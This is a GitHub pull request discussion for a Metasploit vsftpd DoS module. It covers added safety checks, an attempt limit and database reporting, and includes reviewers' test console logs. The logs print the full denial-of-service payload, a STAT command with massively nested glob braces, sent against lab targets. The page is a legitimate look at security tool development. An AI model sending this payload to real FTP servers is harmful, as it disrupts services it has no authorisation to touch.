vsftpd_232: Misc fix ups#21369
Conversation
bc80e14 to
7a74bb3
Compare
70067c1 to
029069a
Compare
b199435 to
6cfb24c
Compare
There was a problem hiding this comment.
Pull request overview
Updates the auxiliary/dos/ftp/vsftpd_232 module to make execution safer by default and improve operator feedback and database reporting, primarily by adopting AutoCheck, adding an attempts limit, and expanding service/note/vuln reporting.
Changes:
- Add
Msf::Exploit::Remote::AutoChecksupport and adjust thecheckflow to useconnect+ banner/STAT output logging. - Add
MAX_ATTEMPTSto cap retry loops (avoids effectively infinite DoS loops by default). - Add workspace reporting helpers (
report_noteforSTAToutput,report_vulnhelper) and clean up module messaging.
Impact Analysis:
- Blast radius: Low — isolated to a single auxiliary module.
- Data and contract effects: Adds/changes DB artifacts (notes/vulns) emitted by this module; potential for duplicate/false-positive vuln entries if not addressed.
- Rollback and test focus: Rollback is straightforward (single file); validate
check/runbehavior on non-FTP targets, FTP servers that don’t send banners, and on unreachable/closed ports to avoid false positives.
jheysel-r7
left a comment
There was a problem hiding this comment.
Thanks for the PR @g0tmi1k. Copilot raised a couple good points. Other than those LGTM
Testing
msf auxiliary(dos/ftp/vsftpd_232) > set rport 21
rport => 21
msf auxiliary(dos/ftp/vsftpd_232) > run
[*] Running module against 10.5.132.178
[*] 10.5.132.178:21 - Running automatic check ("set AutoCheck false" to disable)
[*] 10.5.132.178:21 - Connecting to FTP server...
[*] 10.5.132.178:21 - Connected to target FTP server
[*] 10.5.132.178:21 - FTP banner: vsFTPd 2.3.4
[*] 10.5.132.178:21 - STAT: 211-FTP server status:
[*] 10.5.132.178:21 - Connected to 192.168.3.8
[*] 10.5.132.178:21 - Logged in as ftp
[*] 10.5.132.178:21 - TYPE: ASCII
[*] 10.5.132.178:21 - No session bandwidth limit
[*] 10.5.132.178:21 - Session timeout in seconds is 300
[*] 10.5.132.178:21 - Control connection is plain text
[*] 10.5.132.178:21 - Data connections will be plain text
[*] 10.5.132.178:21 - vsFTPd 2.3.4 - secure, fast, stable
[*] 10.5.132.178:21 - 211 End of status
[!] 10.5.132.178:21 - The target is not exploitable. VSFTPD 2.3.4 is not vulnerable (affected: <= 2.3.2) ForceExploit is enabled, proceeding with exploitation.
[*] 10.5.132.178:21 - FTP DoS command: STAT {{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{.}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}
[*] 10.5.132.178:21 - Attempt: 1/25 - Sending DoS command
[*] 10.5.132.178:21 - Connecting to FTP server...
[*] 10.5.132.178:21 - Connected to target FTP server
[*] 10.5.132.178:21 - Authenticating as anonymous with password mozilla@example.com...
[*] 10.5.132.178:21 - Sending password...
...
[*] 10.5.132.178:21 - Attempt: 25/25 - Sending DoS command
[*] 10.5.132.178:21 - Connecting to FTP server...
[*] 10.5.132.178:21 - Connected to target FTP server
[*] 10.5.132.178:21 - Authenticating as anonymous with password mozilla@example.com...
[*] 10.5.132.178:21 - Sending password...
[-] 10.5.132.178:21 - Reached 25 attempts without DoS
[*] Auxiliary module execution completed
msf auxiliary(dos/ftp/vsftpd_232) > workspace -v
Workspaces
==========
current name hosts services vulns creds loots notes
------- ---- ----- -------- ----- ----- ----- -----
* default 1 2 0 0 0 2
msf auxiliary(dos/ftp/vsftpd_232) > set rport 2121
rport => 2121
msf auxiliary(dos/ftp/vsftpd_232) > run
[*] Running module against 10.5.132.178
[*] 10.5.132.178:2121 - Running automatic check ("set AutoCheck false" to disable)
[*] 10.5.132.178:2121 - Connecting to FTP server...
[*] 10.5.132.178:2121 - Connected to target FTP server
[!] 10.5.132.178:2121 - The target is not exploitable. Does not appear to be VSFTPD (banner: ProFTPD 1.3.1 Server (Debian)) ForceExploit is enabled, proceeding with exploitation.
[*] 10.5.132.178:2121 - FTP DoS command: STAT {{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{{*},{.}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}
[*] 10.5.132.178:2121 - Attempt: 1/25 - Sending DoS command
[*] 10.5.132.178:2121 - Connecting to FTP server...
[*] 10.5.132.178:2121 - Connected to target FTP server
[*] 10.5.132.178:2121 - Authenticating as anonymous with password mozilla@example.com...
[*] 10.5.132.178:2121 - Sending password...
[-] 10.5.132.178:2121 - The server rejected our password
[-] 10.5.132.178:2121 - Authentication failed - check FTPUSER/FTPPASS credentials
[*] Auxiliary module execution completed
msf auxiliary(dos/ftp/vsftpd_232) > workspace -v
Workspaces
==========
current name hosts services vulns creds loots notes
------- ---- ----- -------- ----- ----- ----- -----
* default 1 4 0 0 0 3
msf auxiliary(dos/ftp/vsftpd_232) > services -v
Services
========
host port proto name state info resource parents
---- ---- ----- ---- ----- ---- -------- -------
10.5.132.178 21 tcp ftp open vsFTPd 2.3.4 {} tcp (21/tcp)
10.5.132.178 21 tcp tcp open {}
10.5.132.178 2121 tcp ftp open ProFTPD 1.3.1 Server (Debian) {} tcp (2121/tcp)
10.5.132.178 2121 tcp tcp open {}
msf auxiliary(dos/ftp/vsftpd_232) > notes -v
Notes
=====
Time Host Service Port Protocol Type Data
---- ---- ------- ---- -------- ---- ----
2026-06-09 17:59:02 UTC 10.5.132.178 ftp 21 tcp ftp.banner {:banner=>"220 (vsFTPd 2.3.4)"}
2026-06-09 17:59:02 UTC 10.5.132.178 ftp 21 tcp ftp.cmd.stat {:username=>"anonymous", :output=>"211-FTP server status:\r\n Connected to 192.168.3.8\r\n
Logged in as ftp\r\n TYPE: ASCII\r\n No session bandwidth limit\r\n Session timeout i
n seconds is 300\r\n Control connection is plain text\r\n Data connections will be plain t
ext\r\n vsFTPd 2.3.4 - secure, fast, stable\r\n211 End of status"}
2026-06-09 17:59:46 UTC 10.5.132.178 ftp 2121 tcp ftp.banner {:banner=>"220 ProFTPD 1.3.1 Server (Debian) [::ffff:10.5.132.178]"}
|
Hey hey @jheysel-r7 - Thanks for making the time to review. |
Stop DoS after success Stop if response didn't go to plan
jheysel-r7
left a comment
There was a problem hiding this comment.
Thanks for making those changes @g0tmi1k 🚀
Release NotesThis adds a number of enhancements for the vsftpd_232 module. It improves the check method, module output and reporting. |
|
Thanking you @jheysel-r7 ! |
This isn't anything major, was just little misc items:
report_service()/report_vuln()/report_note())onnect_login()->connect()(able to troubleshoot more)Target is Metasploitable 2 (but its not vulnerable to it).
Before
After